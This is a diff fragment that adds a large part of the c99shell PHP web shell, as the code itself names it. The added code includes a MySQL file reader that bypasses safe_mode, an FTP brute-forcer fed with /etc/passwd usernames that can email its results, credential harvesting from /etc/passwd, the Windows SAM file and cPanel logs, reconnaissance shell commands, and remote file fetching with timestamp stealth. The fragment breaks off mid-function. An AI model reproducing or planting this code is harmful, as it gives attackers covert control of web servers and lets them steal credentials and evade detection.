+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\">^<select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
